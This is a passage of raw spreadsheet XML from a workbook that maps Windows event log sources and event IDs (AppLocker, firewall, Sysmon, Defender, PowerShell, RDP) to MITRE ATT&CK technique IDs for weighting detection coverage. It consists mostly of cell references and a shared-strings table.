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defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\ohartong\tools\ATTACKdatamap\Final\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="10_ncr:100000_{4904DB05-A409-403F-94C2-6A7DEB97BFDA}" xr6:coauthVersionLast="31" xr6:coauthVersionMax="31" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="14370" windowHeight="11475" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="DataSourceEvents" sheetId="1" r:id="rId1"/>
    <sheet name="TechniqueDataSourceWeights" sheetId="2" r:id="rId2"/>
    <sheet name="RatingLegend" sheetId="3" r:id="rId3"/>
    <sheet name="KnowledgeBase" sheetId="4" r:id="rId4"/>
    <sheet name="REF-DataSources" sheetId="5" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">KnowledgeBase!$A$1:$E$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">TechniqueDataSourceWeights!$A$2:$G$224</definedName>
  </definedNames>
  <calcPr calcId="179017"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4" i="2" l="1"/>
  <c r="B224" i="2"/>
  <c r="D224" i="2" s="1"/>
  <c r="E223" i="2"/>
  <c r="B223" i="2"/>
  <c r="D223" i="2" s="1"/>
  <c r="E222" i="2"/>
  <c r="D222" i="2"/>
  <c r="B222" i="2"/>
  <c r="E221" i="2"/>
  <c r="B221" i="2"/>
  <c r="D221" i="2" s="1"/>
  <c r="E220" i="2"/>
  <c r="B220" i="2"/>
  <c r="D220" i="2" s="1"/>
  <c r="E219" i="2"/>
  <c r="B219" i="2"/>
  <c r="D219" i="2" s="1"/>
  <c r="E218" i="2"/>
  <c r="B218" i="2"/>
  <c r="D218" i="2" s="1"/>
  <c r="E217" i="2"/>
  <c r="B217" i="2"/>
  <c r="D217" i="2" s="1"/>
  <c r="E216" i="2"/>
  <c r="B216" i="2"/>
  <c r="D216" i="2" s="1"/>
  <c r="E215" i="2"/>
  <c r="B215" i="2"/>
  <c r="D215" i="2" s="1"/>
  <c r="E214" i="2"/>
  <c r="D214" i="2"/>
  <c r="B214" i="2"/>
  <c r="E213" i="2"/>
  <c r="B213" i="2"/>
  <c r="D213" i="2" s="1"/>
  <c r="E212" i="2"/>
  <c r="B212" i="2"/>
  <c r="D212" i="2" s="1"/>
  <c r="E211" i="2"/>
  <c r="B211" i="2"/>
  <c r="D211" i="2" s="1"/>
  <c r="E210" i="2"/>
  <c r="D210" i="2"/>
  <c r="B210" i="2"/>
  <c r="E209" i="2"/>
  <c r="B209" i="2"/>
  <c r="D209" i="2" s="1"/>
  <c r="E208" i="2"/>
  <c r="B208" i="2"/>
  <c r="D208" i="2" s="1"/>
  <c r="E207" i="2"/>
  <c r="D207" i="2"/>
  <c r="B207" i="2"/>
  <c r="E206" i="2"/>
  <c r="D206" i="2"/>
  <c r="B206" i="2"/>
  <c r="E205" i="2"/>
  <c r="B205" i="2"/>
  <c r="D205" i="2" s="1"/>
  <c r="E204" i="2"/>
  <c r="B204" i="2"/>
  <c r="D204" i="2" s="1"/>
  <c r="E203" i="2"/>
  <c r="B203" i="2"/>
  <c r="D203" i="2" s="1"/>
  <c r="E202" i="2"/>
  <c r="B202" i="2"/>
  <c r="D202" i="2" s="1"/>
  <c r="E201" i="2"/>
  <c r="B201" i="2"/>
  <c r="D201" i="2" s="1"/>
  <c r="E200" i="2"/>
  <c r="B200" i="2"/>
  <c r="D200" i="2" s="1"/>
  <c r="E199" i="2"/>
  <c r="D199" i="2"/>
  <c r="B199" i="2"/>
  <c r="E198" i="2"/>
  <c r="D198" i="2"/>
  <c r="B198" i="2"/>
  <c r="E197" i="2"/>
  <c r="B197" i="2"/>
  <c r="D197" i="2" s="1"/>
  <c r="E196" i="2"/>
  <c r="B196" i="2"/>
  <c r="D196" i="2" s="1"/>
  <c r="E195" i="2"/>
  <c r="B195" i="2"/>
  <c r="D195" i="2" s="1"/>
  <c r="E194" i="2"/>
  <c r="B194" i="2"/>
  <c r="D194" i="2" s="1"/>
  <c r="E193" i="2"/>
  <c r="B193" i="2"/>
  <c r="D193" i="2" s="1"/>
  <c r="E192" i="2"/>
  <c r="B192" i="2"/>
  <c r="D192" i="2" s="1"/>
  <c r="E191" i="2"/>
  <c r="D191" i="2"/>
  <c r="B191" i="2"/>
  <c r="E190" i="2"/>
  <c r="D190" i="2"/>
  <c r="B190" i="2"/>
  <c r="E189" i="2"/>
  <c r="B189" i="2"/>
  <c r="D189" i="2" s="1"/>
  <c r="E188" i="2"/>
  <c r="B188" i="2"/>
  <c r="D188" i="2" s="1"/>
  <c r="E187" i="2"/>
  <c r="B187" i="2"/>
  <c r="D187" i="2" s="1"/>
  <c r="E186" i="2"/>
  <c r="B186" i="2"/>
  <c r="D186" i="2" s="1"/>
  <c r="E185" i="2"/>
  <c r="B185" i="2"/>
  <c r="D185" i="2" s="1"/>
  <c r="E184" i="2"/>
  <c r="B184" i="2"/>
  <c r="D184" i="2" s="1"/>
  <c r="E183" i="2"/>
  <c r="D183" i="2"/>
  <c r="B183" i="2"/>
  <c r="E182" i="2"/>
  <c r="D182" i="2"/>
  <c r="B182" i="2"/>
  <c r="E181" i="2"/>
  <c r="B181" i="2"/>
  <c r="D181" i="2" s="1"/>
  <c r="E180" i="2"/>
  <c r="B180" i="2"/>
  <c r="D180" i="2" s="1"/>
  <c r="E179" i="2"/>
  <c r="B179" i="2"/>
  <c r="D179" i="2" s="1"/>
  <c r="E178" i="2"/>
  <c r="B178" i="2"/>
  <c r="D178" i="2" s="1"/>
  <c r="E177" i="2"/>
  <c r="B177" i="2"/>
  <c r="D177" i="2" s="1"/>
  <c r="E176" i="2"/>
  <c r="B176" i="2"/>
  <c r="D176" i="2" s="1"/>
  <c r="E175" i="2"/>
  <c r="D175" i="2"/>
  <c r="B175" i="2"/>
  <c r="E174" i="2"/>
  <c r="D174" i="2"/>
  <c r="B174" i="2"/>
  <c r="E173" i="2"/>
  <c r="B173" i="2"/>
  <c r="D173" i="2" s="1"/>
  <c r="E172" i="2"/>
  <c r="B172" i="2"/>
  <c r="D172" i="2" s="1"/>
  <c r="E171" i="2"/>
  <c r="B171" i="2"/>
  <c r="D171" i="2" s="1"/>
  <c r="E170" i="2"/>
  <c r="B170" i="2"/>
  <c r="D170" i="2" s="1"/>
  <c r="E169" i="2"/>
  <c r="B169" i="2"/>
  <c r="D169" i="2" s="1"/>
  <c r="E168" i="2"/>
  <c r="B168" i="2"/>
  <c r="D168" i="2" s="1"/>
  <c r="E167" i="2"/>
  <c r="D167" i="2"/>
  <c r="B167" i="2"/>
  <c r="E166" i="2"/>
  <c r="D166" i="2"/>
  <c r="B166" i="2"/>
  <c r="E165" i="2"/>
  <c r="B165" i="2"/>
  <c r="D165" i="2" s="1"/>
  <c r="E164" i="2"/>
  <c r="B164" i="2"/>
  <c r="D164" i="2" s="1"/>
  <c r="E163" i="2"/>
  <c r="B163" i="2"/>
  <c r="D163" i="2" s="1"/>
  <c r="E162" i="2"/>
  <c r="B162" i="2"/>
  <c r="D162" i="2" s="1"/>
  <c r="E161" i="2"/>
  <c r="B161" i="2"/>
  <c r="D161" i="2" s="1"/>
  <c r="E160" i="2"/>
  <c r="B160" i="2"/>
  <c r="D160" i="2" s="1"/>
  <c r="E159" i="2"/>
  <c r="D159" i="2"/>
  <c r="B159" i="2"/>
  <c r="E158" i="2"/>
  <c r="D158" i="2"/>
  <c r="B158" i="2"/>
  <c r="E157" i="2"/>
  <c r="B157" i="2"/>
  <c r="D157" i="2" s="1"/>
  <c r="E156" i="2"/>
  <c r="B156" i="2"/>
  <c r="D156" i="2" s="1"/>
  <c r="E155" i="2"/>
  <c r="B155" i="2"/>
  <c r="D155" i="2" s="1"/>
  <c r="E154" i="2"/>
  <c r="B154" i="2"/>
  <c r="D154" i="2" s="1"/>
  <c r="E153" i="2"/>
  <c r="B153" i="2"/>
  <c r="D153" i="2" s="1"/>
  <c r="E152" i="2"/>
  <c r="B152" i="2"/>
  <c r="D152" i="2" s="1"/>
  <c r="E151" i="2"/>
  <c r="D151" i="2"/>
  <c r="B151" i="2"/>
  <c r="E150" i="2"/>
  <c r="D150" i="2"/>
  <c r="B150" i="2"/>
  <c r="E149" i="2"/>
  <c r="B149" i="2"/>
  <c r="D149" i="2" s="1"/>
  <c r="E148" i="2"/>
  <c r="B148" i="2"/>
  <c r="D148" i="2" s="1"/>
  <c r="E147" i="2"/>
  <c r="B147" i="2"/>
  <c r="D147" i="2" s="1"/>
  <c r="E146" i="2"/>
  <c r="B146" i="2"/>
  <c r="D146" i="2" s="1"/>
  <c r="E145" i="2"/>
  <c r="B145" i="2"/>
  <c r="D145" i="2" s="1"/>
  <c r="E144" i="2"/>
  <c r="B144" i="2"/>
  <c r="D144" i="2" s="1"/>
  <c r="E143" i="2"/>
  <c r="D143" i="2"/>
  <c r="B143" i="2"/>
  <c r="E142" i="2"/>
  <c r="D142" i="2"/>
  <c r="B142" i="2"/>
  <c r="E141" i="2"/>
  <c r="B141" i="2"/>
  <c r="D141" i="2" s="1"/>
  <c r="E140" i="2"/>
  <c r="B140" i="2"/>
  <c r="D140" i="2" s="1"/>
  <c r="E139" i="2"/>
  <c r="B139" i="2"/>
  <c r="D139" i="2" s="1"/>
  <c r="E138" i="2"/>
  <c r="B138" i="2"/>
  <c r="D138" i="2" s="1"/>
  <c r="E137" i="2"/>
  <c r="B137" i="2"/>
  <c r="D137" i="2" s="1"/>
  <c r="E136" i="2"/>
  <c r="B136" i="2"/>
  <c r="D136" i="2" s="1"/>
  <c r="E135" i="2"/>
  <c r="D135" i="2"/>
  <c r="B135" i="2"/>
  <c r="E134" i="2"/>
  <c r="D134" i="2"/>
  <c r="B134" i="2"/>
  <c r="E133" i="2"/>
  <c r="B133" i="2"/>
  <c r="D133" i="2" s="1"/>
  <c r="E132" i="2"/>
  <c r="B132" i="2"/>
  <c r="D132" i="2" s="1"/>
  <c r="E131" i="2"/>
  <c r="B131" i="2"/>
  <c r="D131" i="2" s="1"/>
  <c r="E130" i="2"/>
  <c r="B130" i="2"/>
  <c r="D130" i="2" s="1"/>
  <c r="E129" i="2"/>
  <c r="B129" i="2"/>
  <c r="D129" i="2" s="1"/>
  <c r="E128" i="2"/>
  <c r="B128" i="2"/>
  <c r="D128" i="2" s="1"/>
  <c r="E127" i="2"/>
  <c r="D127" i="2"/>
  <c r="B127" i="2"/>
  <c r="E126" i="2"/>
  <c r="D126" i="2"/>
  <c r="B126" i="2"/>
  <c r="E125" i="2"/>
  <c r="B125" i="2"/>
  <c r="D125" i="2" s="1"/>
  <c r="E124" i="2"/>
  <c r="B124" i="2"/>
  <c r="D124" i="2" s="1"/>
  <c r="E123" i="2"/>
  <c r="B123" i="2"/>
  <c r="D123" i="2" s="1"/>
  <c r="E122" i="2"/>
  <c r="B122" i="2"/>
  <c r="D122" i="2" s="1"/>
  <c r="E121" i="2"/>
  <c r="B121" i="2"/>
  <c r="D121" i="2" s="1"/>
  <c r="E120" i="2"/>
  <c r="B120" i="2"/>
  <c r="D120" i="2" s="1"/>
  <c r="E119" i="2"/>
  <c r="D119" i="2"/>
  <c r="B119" i="2"/>
  <c r="E118" i="2"/>
  <c r="D118" i="2"/>
  <c r="B118" i="2"/>
  <c r="E117" i="2"/>
  <c r="B117" i="2"/>
  <c r="D117" i="2" s="1"/>
  <c r="E116" i="2"/>
  <c r="B116" i="2"/>
  <c r="D116" i="2" s="1"/>
  <c r="E115" i="2"/>
  <c r="B115" i="2"/>
  <c r="D115" i="2" s="1"/>
  <c r="E114" i="2"/>
  <c r="B114" i="2"/>
  <c r="D114" i="2" s="1"/>
  <c r="E113" i="2"/>
  <c r="B113" i="2"/>
  <c r="D113" i="2" s="1"/>
  <c r="E112" i="2"/>
  <c r="B112" i="2"/>
  <c r="D112" i="2" s="1"/>
  <c r="E111" i="2"/>
  <c r="D111" i="2"/>
  <c r="B111" i="2"/>
  <c r="E110" i="2"/>
  <c r="D110" i="2"/>
  <c r="B110" i="2"/>
  <c r="E109" i="2"/>
  <c r="B109" i="2"/>
  <c r="D109" i="2" s="1"/>
  <c r="E108" i="2"/>
  <c r="B108" i="2"/>
  <c r="D108" i="2" s="1"/>
  <c r="E107" i="2"/>
  <c r="B107" i="2"/>
  <c r="D107" i="2" s="1"/>
  <c r="E106" i="2"/>
  <c r="B106" i="2"/>
  <c r="D106" i="2" s="1"/>
  <c r="E105" i="2"/>
  <c r="D105" i="2"/>
  <c r="B105" i="2"/>
  <c r="E104" i="2"/>
  <c r="B104" i="2"/>
  <c r="D104" i="2" s="1"/>
  <c r="E103" i="2"/>
  <c r="B103" i="2"/>
  <c r="D103" i="2" s="1"/>
  <c r="E102" i="2"/>
  <c r="D102" i="2"/>
  <c r="B102" i="2"/>
  <c r="E101" i="2"/>
  <c r="D101" i="2"/>
  <c r="B101" i="2"/>
  <c r="E100" i="2"/>
  <c r="B100" i="2"/>
  <c r="D100" i="2" s="1"/>
  <c r="E99" i="2"/>
  <c r="D99" i="2"/>
  <c r="B99" i="2"/>
  <c r="E98" i="2"/>
  <c r="D98" i="2"/>
  <c r="B98" i="2"/>
  <c r="E97" i="2"/>
  <c r="B97" i="2"/>
  <c r="D97" i="2" s="1"/>
  <c r="E96" i="2"/>
  <c r="B96" i="2"/>
  <c r="D96" i="2" s="1"/>
  <c r="E95" i="2"/>
  <c r="B95" i="2"/>
  <c r="D95" i="2" s="1"/>
  <c r="E94" i="2"/>
  <c r="B94" i="2"/>
  <c r="D94" i="2" s="1"/>
  <c r="E93" i="2"/>
  <c r="B93" i="2"/>
  <c r="D93" i="2" s="1"/>
  <c r="E92" i="2"/>
  <c r="B92" i="2"/>
  <c r="D92" i="2" s="1"/>
  <c r="E91" i="2"/>
  <c r="D91" i="2"/>
  <c r="B91" i="2"/>
  <c r="E90" i="2"/>
  <c r="D90" i="2"/>
  <c r="B90" i="2"/>
  <c r="E89" i="2"/>
  <c r="B89" i="2"/>
  <c r="D89" i="2" s="1"/>
  <c r="E88" i="2"/>
  <c r="B88" i="2"/>
  <c r="D88" i="2" s="1"/>
  <c r="E87" i="2"/>
  <c r="D87" i="2"/>
  <c r="B87" i="2"/>
  <c r="E86" i="2"/>
  <c r="B86" i="2"/>
  <c r="D86" i="2" s="1"/>
  <c r="E85" i="2"/>
  <c r="B85" i="2"/>
  <c r="D85" i="2" s="1"/>
  <c r="E84" i="2"/>
  <c r="B84" i="2"/>
  <c r="D84" i="2" s="1"/>
  <c r="E83" i="2"/>
  <c r="B83" i="2"/>
  <c r="D83" i="2" s="1"/>
  <c r="E82" i="2"/>
  <c r="B82" i="2"/>
  <c r="D82" i="2" s="1"/>
  <c r="E81" i="2"/>
  <c r="B81" i="2"/>
  <c r="D81" i="2" s="1"/>
  <c r="E80" i="2"/>
  <c r="B80" i="2"/>
  <c r="D80" i="2" s="1"/>
  <c r="E79" i="2"/>
  <c r="D79" i="2"/>
  <c r="B79" i="2"/>
  <c r="E78" i="2"/>
  <c r="D78" i="2"/>
  <c r="B78" i="2"/>
  <c r="E77" i="2"/>
  <c r="B77" i="2"/>
  <c r="D77" i="2" s="1"/>
  <c r="E76" i="2"/>
  <c r="B76" i="2"/>
  <c r="D76" i="2" s="1"/>
  <c r="E75" i="2"/>
  <c r="B75" i="2"/>
  <c r="D75" i="2" s="1"/>
  <c r="E74" i="2"/>
  <c r="B74" i="2"/>
  <c r="D74" i="2" s="1"/>
  <c r="E73" i="2"/>
  <c r="D73" i="2"/>
  <c r="B73" i="2"/>
  <c r="E72" i="2"/>
  <c r="B72" i="2"/>
  <c r="D72" i="2" s="1"/>
  <c r="E71" i="2"/>
  <c r="B71" i="2"/>
  <c r="D71" i="2" s="1"/>
  <c r="E70" i="2"/>
  <c r="D70" i="2"/>
  <c r="B70" i="2"/>
  <c r="E69" i="2"/>
  <c r="D69" i="2"/>
  <c r="B69" i="2"/>
  <c r="E68" i="2"/>
  <c r="B68" i="2"/>
  <c r="D68" i="2" s="1"/>
  <c r="E67" i="2"/>
  <c r="D67" i="2"/>
  <c r="B67" i="2"/>
  <c r="E66" i="2"/>
  <c r="D66" i="2"/>
  <c r="B66" i="2"/>
  <c r="E65" i="2"/>
  <c r="B65" i="2"/>
  <c r="D65" i="2" s="1"/>
  <c r="E64" i="2"/>
  <c r="B64" i="2"/>
  <c r="D64" i="2" s="1"/>
  <c r="E63" i="2"/>
  <c r="B63" i="2"/>
  <c r="D63" i="2" s="1"/>
  <c r="E62" i="2"/>
  <c r="B62" i="2"/>
  <c r="D62" i="2" s="1"/>
  <c r="E61" i="2"/>
  <c r="B61" i="2"/>
  <c r="D61" i="2" s="1"/>
  <c r="E60" i="2"/>
  <c r="B60" i="2"/>
  <c r="D60" i="2" s="1"/>
  <c r="E59" i="2"/>
  <c r="D59" i="2"/>
  <c r="B59" i="2"/>
  <c r="E58" i="2"/>
  <c r="D58" i="2"/>
  <c r="B58" i="2"/>
  <c r="E57" i="2"/>
  <c r="B57" i="2"/>
  <c r="D57" i="2" s="1"/>
  <c r="E56" i="2"/>
  <c r="B56" i="2"/>
  <c r="D56" i="2" s="1"/>
  <c r="E55" i="2"/>
  <c r="D55" i="2"/>
  <c r="B55" i="2"/>
  <c r="E54" i="2"/>
  <c r="B54" i="2"/>
  <c r="D54" i="2" s="1"/>
  <c r="E53" i="2"/>
  <c r="B53" i="2"/>
  <c r="D53" i="2" s="1"/>
  <c r="E52" i="2"/>
  <c r="B52" i="2"/>
  <c r="D52" i="2" s="1"/>
  <c r="E51" i="2"/>
  <c r="B51" i="2"/>
  <c r="D51" i="2" s="1"/>
  <c r="E50" i="2"/>
  <c r="B50" i="2"/>
  <c r="D50" i="2" s="1"/>
  <c r="E49" i="2"/>
  <c r="B49" i="2"/>
  <c r="D49" i="2" s="1"/>
  <c r="E48" i="2"/>
  <c r="B48" i="2"/>
  <c r="D48" i="2" s="1"/>
  <c r="E47" i="2"/>
  <c r="D47" i="2"/>
  <c r="B47" i="2"/>
  <c r="E46" i="2"/>
  <c r="D46" i="2"/>
  <c r="B46" i="2"/>
  <c r="E45" i="2"/>
  <c r="B45" i="2"/>
  <c r="D45" i="2" s="1"/>
  <c r="E44" i="2"/>
  <c r="B44" i="2"/>
  <c r="D44" i="2" s="1"/>
  <c r="E43" i="2"/>
  <c r="B43" i="2"/>
  <c r="D43" i="2" s="1"/>
  <c r="E42" i="2"/>
  <c r="B42" i="2"/>
  <c r="D42" i="2" s="1"/>
  <c r="E41" i="2"/>
  <c r="D41" i="2"/>
  <c r="B41" i="2"/>
  <c r="E40" i="2"/>
  <c r="B40" i="2"/>
  <c r="D40" i="2" s="1"/>
  <c r="E39" i="2"/>
  <c r="B39" i="2"/>
  <c r="D39" i="2" s="1"/>
  <c r="E38" i="2"/>
  <c r="D38" i="2"/>
  <c r="B38" i="2"/>
  <c r="E37" i="2"/>
  <c r="D37" i="2"/>
  <c r="B37" i="2"/>
  <c r="E36" i="2"/>
  <c r="B36" i="2"/>
  <c r="D36" i="2" s="1"/>
  <c r="E35" i="2"/>
  <c r="D35" i="2"/>
  <c r="B35" i="2"/>
  <c r="E34" i="2"/>
  <c r="D34" i="2"/>
  <c r="B34" i="2"/>
  <c r="E33" i="2"/>
  <c r="B33" i="2"/>
  <c r="D33" i="2" s="1"/>
  <c r="E32" i="2"/>
  <c r="B32" i="2"/>
  <c r="D32" i="2" s="1"/>
  <c r="E31" i="2"/>
  <c r="B31" i="2"/>
  <c r="D31" i="2" s="1"/>
  <c r="E30" i="2"/>
  <c r="B30" i="2"/>
  <c r="D30" i="2" s="1"/>
  <c r="E29" i="2"/>
  <c r="B29" i="2"/>
  <c r="D29" i="2" s="1"/>
  <c r="E28" i="2"/>
  <c r="B28" i="2"/>
  <c r="D28" i="2" s="1"/>
  <c r="E27" i="2"/>
  <c r="D27" i="2"/>
  <c r="B27" i="2"/>
  <c r="E26" i="2"/>
  <c r="B26" i="2"/>
  <c r="D26" i="2" s="1"/>
  <c r="E25" i="2"/>
  <c r="D25" i="2"/>
  <c r="B25" i="2"/>
  <c r="E24" i="2"/>
  <c r="B24" i="2"/>
  <c r="D24" i="2" s="1"/>
  <c r="E23" i="2"/>
  <c r="B23" i="2"/>
  <c r="D23" i="2" s="1"/>
  <c r="E22" i="2"/>
  <c r="D22" i="2"/>
  <c r="B22" i="2"/>
  <c r="E21" i="2"/>
  <c r="D21" i="2"/>
  <c r="B21" i="2"/>
  <c r="E20" i="2"/>
  <c r="B20" i="2"/>
  <c r="D20" i="2" s="1"/>
  <c r="E19" i="2"/>
  <c r="D19" i="2"/>
  <c r="B19" i="2"/>
  <c r="E18" i="2"/>
  <c r="D18" i="2"/>
  <c r="B18" i="2"/>
  <c r="E17" i="2"/>
  <c r="B17" i="2"/>
  <c r="D17" i="2" s="1"/>
  <c r="E16" i="2"/>
  <c r="B16" i="2"/>
  <c r="D16" i="2" s="1"/>
  <c r="E15" i="2"/>
  <c r="B15" i="2"/>
  <c r="D15" i="2" s="1"/>
  <c r="E14" i="2"/>
  <c r="B14" i="2"/>
  <c r="D14" i="2" s="1"/>
  <c r="E13" i="2"/>
  <c r="B13" i="2"/>
  <c r="D13" i="2" s="1"/>
  <c r="E12" i="2"/>
  <c r="B12" i="2"/>
  <c r="D12" i="2" s="1"/>
  <c r="E11" i="2"/>
  <c r="D11" i="2"/>
  <c r="B11" i="2"/>
  <c r="E10" i="2"/>
  <c r="B10" i="2"/>
  <c r="D10" i="2" s="1"/>
  <c r="E9" i="2"/>
  <c r="D9" i="2"/>
  <c r="B9" i="2"/>
  <c r="E8" i="2"/>
  <c r="B8" i="2"/>
  <c r="D8" i="2" s="1"/>
  <c r="E7" i="2"/>
  <c r="B7" i="2"/>
  <c r="D7" i="2" s="1"/>
  <c r="E6" i="2"/>
  <c r="D6" i="2"/>
  <c r="B6" i="2"/>
  <c r="E5" i="2"/>
  <c r="D5" i="2"/>
  <c r="B5" i="2"/>
  <c r="E4" i="2"/>
  <c r="B4" i="2"/>
  <c r="D4" i="2" s="1"/>
  <c r="E3" i="2"/>
  <c r="D3" i="2"/>
  <c r="B3" i="2"/>
  <c r="G2" i="2"/>
  <c r="E2" i="2"/>
  <c r="D2" i="2"/>
  <c r="B2" i="2"/>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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2229" uniqueCount="1316">
  <si>
    <t xml:space="preserve">Category </t>
  </si>
  <si>
    <t>Event</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Application whitelisting</t>
  </si>
  <si>
    <t>AppLocker Block</t>
  </si>
  <si>
    <t>AppLocker Warning</t>
  </si>
  <si>
    <t>SRP Block</t>
  </si>
  <si>
    <t>865, 866, 867, 868, 882</t>
  </si>
  <si>
    <t>Application crashes</t>
  </si>
  <si>
    <t>App Hang</t>
  </si>
  <si>
    <t>Appcrash</t>
  </si>
  <si>
    <t>EMET</t>
  </si>
  <si>
    <t>System or Service Failures</t>
  </si>
  <si>
    <t>Windows Service Fails or Crashes</t>
  </si>
  <si>
    <t>7022, 7023, 7024, 7026, 7031, 7032, 7034</t>
  </si>
  <si>
    <t>Windows firewall</t>
  </si>
  <si>
    <t>Firewall Rule Add</t>
  </si>
  <si>
    <t>Firewall Rule Change</t>
  </si>
  <si>
    <t>Firewall Rules Deleted</t>
  </si>
  <si>
    <t>2006, 2033</t>
  </si>
  <si>
    <t>Anti-forensics</t>
  </si>
  <si>
    <t>Event Log was Cleared</t>
  </si>
  <si>
    <t>Audit Log was Cleared</t>
  </si>
  <si>
    <t>Event log service stopped</t>
  </si>
  <si>
    <t>Windows:Security</t>
  </si>
  <si>
    <t>Software and Service Installation</t>
  </si>
  <si>
    <t>New Kernel Filter Driver</t>
  </si>
  <si>
    <t>Sysmon</t>
  </si>
  <si>
    <t>Kernel Driver Signing</t>
  </si>
  <si>
    <t>Detect an invalid image hash of a file</t>
  </si>
  <si>
    <t>Detected an invalid page hash of an image file</t>
  </si>
  <si>
    <t>Code integrity check</t>
  </si>
  <si>
    <t>3001, 3002, 3003, 3004, 3010, 3023</t>
  </si>
  <si>
    <t>Failed Kernel Driver Loading</t>
  </si>
  <si>
    <t>Windows Defender</t>
  </si>
  <si>
    <t>Detected Malware</t>
  </si>
  <si>
    <t>Windows:Defender</t>
  </si>
  <si>
    <t>Action on Malware failed</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Scheduled task created</t>
  </si>
  <si>
    <t>Powershell</t>
  </si>
  <si>
    <t>Use of Powershell</t>
  </si>
  <si>
    <t>Windows:PowerShell</t>
  </si>
  <si>
    <t>New Process</t>
  </si>
  <si>
    <t>New process create, include image path, hash, parent process GUID, etc.</t>
  </si>
  <si>
    <t>New Process Create with Command Line Options</t>
  </si>
  <si>
    <t>File Time/Data Change</t>
  </si>
  <si>
    <t>Change of a file create or last modified date</t>
  </si>
  <si>
    <t>Remote Desktop</t>
  </si>
  <si>
    <t>Tracking use of RDP</t>
  </si>
  <si>
    <t>Windows:RDP</t>
  </si>
  <si>
    <t>Network Connection</t>
  </si>
  <si>
    <t>Network connection src &amp; dst, requesting process</t>
  </si>
  <si>
    <t>7045, 10000, 10001, 10100, 20001, 20002, 20003, 24576, 24577, 24579</t>
  </si>
  <si>
    <t>4724, 4738</t>
  </si>
  <si>
    <t>Data Source</t>
  </si>
  <si>
    <t>Weight</t>
  </si>
  <si>
    <t>Datasources</t>
  </si>
  <si>
    <t>Weights</t>
  </si>
  <si>
    <t>Items in Refence vs Items in this sheet</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>T1002</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>49;51</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>T1009</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>T1017</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>T1019</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1022</t>
  </si>
  <si>
    <t>T1023</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>T1032</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>T1042</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>T1044</t>
  </si>
  <si>
    <t>T1045</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>T1063</t>
  </si>
  <si>
    <t>T1064</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>T1066</t>
  </si>
  <si>
    <t>T1067</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>T1073</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>T1075</t>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>T1079</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>T1084</t>
  </si>
  <si>
    <t>T1085</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>T1089</t>
  </si>
  <si>
